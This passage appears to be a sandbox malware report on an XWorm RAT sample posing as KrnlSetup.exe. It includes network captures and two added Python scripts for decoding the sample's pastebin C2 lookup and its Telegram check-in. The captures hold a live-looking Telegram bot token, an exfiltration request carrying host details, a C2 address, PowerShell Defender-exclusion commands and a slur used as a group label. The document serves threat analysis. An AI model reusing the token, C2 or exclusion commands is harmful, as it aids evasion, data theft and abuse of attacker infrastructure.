                                                                              Dec 10, 2024 10:05:26.878104925 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.996306896 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.011248112 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.130613089 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.146817923 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.268727064 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.269717932 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.317778111 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.375780106 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.389163017 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.390328884 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.419871092 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.596647024 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596664906 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596673012 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596682072 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596690893 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596699953 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596708059 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596715927 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596724033 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596733093 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596741915 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596781969 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.743021965 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.743082047 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.862428904 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.862581015 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.982031107 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.982094049 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.982271910 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.031899929 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.037062883 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.142384052 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.142482996 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.156677961 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156689882 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156723022 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156732082 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156874895 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156985044 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156995058 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.157005072 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.157125950 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.157135010 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.261833906 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.261890888 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.382380009 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.382436037 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.504112005 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.504164934 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.623925924 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.624003887 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.654561043 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.691987038 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.786111116 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.789710045 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.811574936 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811598063 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811726093 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811768055 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811871052 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811924934 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.812099934 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.812108040 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.812313080 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.812321901 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.909250021 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.911765099 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.031155109 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.031214952 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.150691032 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.152822971 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.257051945 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.257744074 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.273550034 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.273972988 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.300374985 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.377110004 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.393162012 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.393723965 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.419879913 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.419950962 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.419960976 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.419970036 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.419980049 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420008898 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420017958 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420104027 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420125961 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420218945 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.513109922 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.513756037 CET4979737593192.168.2.4115.69.183.222
Dec 10, 2024 10:05:29.633264065 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:29.633790970 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:29.753144026 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:29.753195047 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:29.838493109 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:29.873114109 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:29.891334057 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:29.892860889 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:29.899276972 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:30.061548948 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:30.062076092 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181102991 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181121111 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181138992 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181147099 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181164980 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:30.181262016 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181272030 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181303024 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181349993 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181441069 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.181480885 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.300570965 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:30.300781965 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:30.300894022 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 10:03:59.358089924 CET | 50335 | 53 | 192.168.2.4 | 1.1.1.1
Dec 10, 2024 10:03:59.495337009 CET | 53 | 50335 | 1.1.1.1 | 192.168.2.4
Dec 10, 2024 10:04:56.928689957 CET | 54231 | 53 | 192.168.2.4 | 1.1.1.1
Dec 10, 2024 10:04:57.065370083 CET | 53 | 54231 | 1.1.1.1 | 192.168.2.4
Dec 10, 2024 10:04:59.252188921 CET | 55779 | 53 | 192.168.2.4 | 1.1.1.1
Dec 10, 2024 10:04:59.390772104 CET | 53 | 55779 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 10:03:59.358089924 CET | 192.168.2.4 | 1.1.1.1 | 0xc8cf | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 10:04:56.928689957 CET | 192.168.2.4 | 1.1.1.1 | 0x115 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 10:04:59.252188921 CET | 192.168.2.4 | 1.1.1.1 | 0x126f | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 10:03:59.495337009 CET | 1.1.1.1 | 192.168.2.4 | 0xc8cf | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 10:04:57.065370083 CET | 1.1.1.1 | 192.168.2.4 | 0x115 | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 10:04:57.065370083 CET | 1.1.1.1 | 192.168.2.4 | 0x115 | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 10:04:57.065370083 CET | 1.1.1.1 | 192.168.2.4 | 0x115 | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 10:04:59.390772104 CET | 1.1.1.1 | 192.168.2.4 | 0x126f | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                              • pastebin.com
                                                                              • api.telegram.org
                                                                              • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 7120 | C:\Users\user\Desktop\KrnlSetup.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 10:03:59.623087883 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 10, 2024 10:04:00.782250881 CET | 175 | IN | HTTP/1.1 200 OK
                                                                              Date: Tue, 10 Dec 2024 09:04:00 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 6
                                                                              Access-Control-Allow-Origin: *
                                                                              X-Ttl: 60
                                                                              X-Rl: 44
                                                                              Data Raw: 66 61 6c 73 65 0a
                                                                              Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 104.20.3.235 | 443 | 7120 | C:\Users\user\Desktop\KrnlSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 09:04:58 UTC | 74 | OUT | GET /raw/5FinF5Mf HTTP/1.1
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
2024-12-10 09:04:59 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                              Date: Tue, 10 Dec 2024 09:04:58 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: MISS
                                                                              Last-Modified: Tue, 10 Dec 2024 09:04:58 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8efc120e089442a6-EWR
2024-12-10 09:04:59 UTC | 26 | IN | Data Raw: 31 34 0d 0a 31 31 35 2e 36 39 2e 31 38 33 2e 32 32 32 3a 33 37 35 39 33 0d 0a
Data Ascii: 14 <CRLF> 115.69.183.222:37593 <CRLF> (chunked body: chunk-size line 0x14 = 20 bytes, then the C2 host:port)
2024-12-10 09:04:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 <CRLF> <CRLF> (terminating zero-length chunk)
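The chunked reply above is how this sample resolves its C2: the paste body is a bare host:port, and the port 37593 it names is the one on the TCP flows to 115.69.183.222 at the top of this section. The Python below is an added example, not part of the Joe Sandbox report or of XWorm; it decodes the two captured chunks, extracts the endpoint, and lists the client ports that talked to it. The chunk bytes and the flow rows are transcribed from the report; the chunk parser and the function names are mine.

```python
"""Dead-drop resolver analysis for the pastebin session above. Added example;
the chunk bytes are copied from the report's Data Raw fields and the flow rows
are transcribed from the TCP packet table, so this runs offline."""
import re

# Both body chunks as captured (hex from the report, joined and parsed as bytes).
PASTEBIN_BODY = bytes.fromhex(
    "31 34 0d 0a 31 31 35 2e 36 39 2e 31 38 33 2e 32 32 32 3a 33 37 35 39 33 0d 0a "
    "30 0d 0a 0d 0a"
)

# TCP flows transcribed from the packet table: (src port, dst port, src IP, dst IP).
FLOWS = [
    (37593, 49797, "115.69.183.222", "192.168.2.4"),
    (49797, 37593, "192.168.2.4", "115.69.183.222"),
    (37593, 49751, "115.69.183.222", "192.168.2.4"),
    (49751, 37593, "192.168.2.4", "115.69.183.222"),
]


def decode_chunked(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: '<hex size>[;ext]\\r\\n<data>\\r\\n'
    repeated until a zero-size chunk. Raises ValueError on truncated input."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk header")
        size = int(body[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)
        if len(body) < pos + size + 2:
            raise ValueError("truncated chunk data")
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that ends the chunk data


HOST_PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")


def extract_c2(body: bytes):
    """Return (ip, port) when the decoded paste is a bare 'ip:port', else None.
    The sample uses the paste verbatim, so anything else means a dead or edited drop."""
    text = decode_chunked(body).decode("ascii", "replace").strip()
    m = HOST_PORT.match(text)
    if not m:
        return None
    ip, port = m.group(1), int(m.group(2))
    if any(int(o) > 255 for o in ip.split(".")) or not 1 <= port <= 65535:
        return None
    return ip, port


def sessions_to_c2(flows, c2):
    """Client-side ports of every flow that touched the resolved endpoint, i.e. the
    sessions that exist only because the paste resolved to it."""
    ip, port = c2
    ports = set()
    for sport, dport, sip, dip in flows:
        if (dip, dport) == (ip, port):
            ports.add(sport)
        elif (sip, sport) == (ip, port):
            ports.add(dport)
    return sorted(ports)


if __name__ == "__main__":
    c2 = extract_c2(PASTEBIN_BODY)
    print("resolved C2:", c2)
    print("client ports talking to it:", sessions_to_c2(FLOWS, c2))
```

Because the paste is fetched fresh on every run, blocking 115.69.183.222 alone is weak; the durable indicator is the fetch of pastebin.com/raw/5FinF5Mf itself, and the same decoder lets you re-check what the paste says whenever the operator rotates the endpoint.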


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49745 | 149.154.167.220 | 443 | 7120 | C:\Users\user\Desktop\KrnlSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 09:05:00 UTC | 447 | OUT | GET /bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEF8C18E803B11A27265E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VO319YB%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20niggereezzzz HTTP/1.1
                                                                              Host: api.telegram.org
                                                                              Connection: Keep-Alive
2024-12-10 09:05:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0
                                                                              Date: Tue, 10 Dec 2024 09:05:01 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 445
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-10 09:05:01 UTC | 445 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 35 32 31 30 36 31 37 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 61 74 69 6f 73 20 73 6c 75 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 61 74 69 6f 73 6c 75 74 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 39 39 31 33 37 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 63 6f 73 6d 69 63 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 61 74 69 6f 6b 69 64 75 77 75 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 38 32 31 35 30 31 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58
                                                                              Data Ascii: {"ok":true,"result":{"message_id":2618,"from":{"id":6521061783,"is_bot":true,"first_name":"Katios slut","username":"katioslutbot"},"chat":{"id":5999137434,"first_name":"cosmic","username":"katiokiduwu","type":"private"},"date":1733821501,"text":"\u2620 [X
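The sendMessage request above is the XWorm check-in: the bot token sits in the URL path, the operator's chat_id in the query, and the host profile is percent-encoded into text as one "Key : Value" line per item. The Python below is an added example, not code from the report or from XWorm; it parses that request line into the indicators a responder would block or hunt on. The request line is copied from the session log except that the operator's group label is replaced by the placeholder GROUP_PLACEHOLDER; the field layout (banner line, then the client id alone on the line after "New Clinet :") is what the decoded text shows, and the function names are mine.

```python
"""Parse the XWorm Telegram check-in captured above into IOCs. Added example,
not part of the report; the request line is copied from the session log with the
operator's group label replaced by a placeholder."""
import re
from urllib.parse import parse_qs, urlsplit

REQUEST_LINE = (
    "GET /bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage"
    "?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0A"
    "New%20Clinet%20:%20%0D%0AEF8C18E803B11A27265E%0D%0A%0D%0A"
    "UserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro"
    "%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VO319YB%20"
    "%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20GROUP_PLACEHOLDER HTTP/1.1"
)

# Telegram bot tokens are '<numeric bot id>:<35 URL-safe characters>'.
BOT_PATH = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]{35})/(\w+)$")
BANNER = re.compile(r"\[XWorm\s+(V[\d.]+)\]")


def parse_beacon(request_line: str) -> dict:
    """Split 'GET <path>?<query> HTTP/1.1' into bot id, token, API method,
    chat_id and the percent-decoded message text."""
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    m = BOT_PATH.match(url.path)
    if method != "GET" or not m:
        raise ValueError("not a Telegram bot API request")
    token, api_method = m.groups()
    query = parse_qs(url.query)  # parse_qs percent-decodes the values
    return {
        "bot_id": token.split(":", 1)[0],
        "token": token,
        "api_method": api_method,
        "chat_id": query.get("chat_id", [None])[0],
        "text": query.get("text", [""])[0],
    }


def parse_fields(text: str) -> dict:
    """Turn the check-in body into a dict. The banner yields 'version'; every
    other 'Key : Value' line is kept, and an empty 'New Clinet' value is taken
    from the next line, where the sample puts the client id."""
    fields = {}
    lines = [ln.strip() for ln in text.splitlines()]
    for i, ln in enumerate(lines):
        banner = BANNER.search(ln)
        if banner:
            fields["version"] = banner.group(1)
        elif ":" in ln:
            key, _, value = ln.partition(":")
            key, value = key.strip(), value.strip()
            if key == "New Clinet" and not value and i + 1 < len(lines):
                value = lines[i + 1]
            fields[key] = value
    return fields


def beacon_iocs(request_line: str) -> dict:
    """Everything worth blocking or hunting on from one captured beacon."""
    b = parse_beacon(request_line)
    f = parse_fields(b["text"])
    return {
        "bot_id": b["bot_id"], "chat_id": b["chat_id"], "api_method": b["api_method"],
        "xworm_version": f.get("version"), "client_id": f.get("New Clinet"),
        "host": f.get("UserName"), "os": f.get("OSFullName"), "group": f.get("Groub"),
    }


if __name__ == "__main__":
    for k, v in beacon_iocs(REQUEST_LINE).items():
        print(f"{k:15} {v}")
```

Two points the parser makes visible: the bot token is a credential, so the captured request is enough to query the bot's own API (getMe, getUpdates) during an investigation, and the chat_id identifies the operator's account independently of the token, which survives token rotation.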



                                                                              Target ID:0
                                                                              Start time:04:03:54
                                                                              Start date:10/12/2024
                                                                              Path:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\KrnlSetup.exe"
                                                                              Imagebase:0x1c0000
                                                                              File size:89'600 bytes
                                                                              MD5 hash:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.0000000002597000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:04:04:00
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:04:04:00
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:04:04:07
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:04:04:07
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:04:04:19
